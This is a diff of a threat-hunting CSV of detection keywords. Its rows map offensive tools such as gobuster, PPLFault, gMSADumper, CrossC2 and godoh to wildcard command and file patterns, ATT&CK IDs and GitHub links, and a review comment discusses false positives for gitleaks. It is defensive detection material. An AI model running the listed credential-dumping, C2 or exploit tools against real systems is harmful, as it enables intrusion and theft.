T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*GIUDA* -askluids*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*GIUDA-main.zip*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*give_dcsync.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"*glassfish_war_upload_xsrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*glassfish_war_upload_xsrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*glebarez/padre*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" "*glit org -*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*glit repo *","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" 
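Review bot: The refreshed `*gitleaks*` row still has `metadata_comment` and `metadata_severity_score` set to `N/A` while both detection flags are `1`, and the bare substring will match ordinary defensive use of the scanner (CI jobs, pre-commit hooks, browsing its repository). I would put a false-positive warning in the comment column, in the wording the greyware rows already use (`greyware_tools high risks of false positives`), and give the row a low severity score. The technique field `T1583 - T1059.001 - T1059.003` does not describe secret hunting in repositories; `T1552.001` looks closer, which the maintainers should confirm against ATT&CK. The neighbouring `*gitleaks detect*` row is attributed to thoth but will also match any direct gitleaks run, so it deserves the same caveat.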
@@ -10923,38 +11074,38 @@ "*gloxec/CrossC2*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*gloxec/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*GmailC2.csproj*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" 
-"*gmsa_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*gmsa_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*gMSADumper.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gMSADumper.py*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" "*GMSAPasswordReader.exe*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential 
Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*GMSAPasswordReader-master*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" -"*GMShellcode*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*GMShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*GMShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*go get -u *traitor/cmd/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*GMShellcode*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GMShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GMShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*go get -u *traitor/cmd/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*go run poc.go check -t http://*:8080 -u Admin*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*go run scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*go_shellcode_encode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" -"*gobfuscate*","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1362","190","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" -"*gobuster dir *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobfuscate*","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. 
This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1362","191","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" +"*gobuster dir *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" "*gobuster dir -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*gobuster dns*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster fuzz -*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster gcs *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - 
TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster s3 *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster tftp *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster vhost -u *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster vhost*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster*","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" 
-"*gobuster_*.tar.gz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster_*.zip*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobusterfuzz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobustertftp*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gocrack@password.crackers.local*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - 
TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*GodFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*GodFault\GodFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*gobuster dns*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster fuzz -*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation 
Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster gcs *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster s3 *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster tftp *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost -u *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" 
+"*gobuster*","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.tar.gz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.zip*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobusterfuzz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobustertftp*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gocrack@password.crackers.local*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*GodFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GodFault\GodFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*godoh -*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh agent*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh c2*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" 
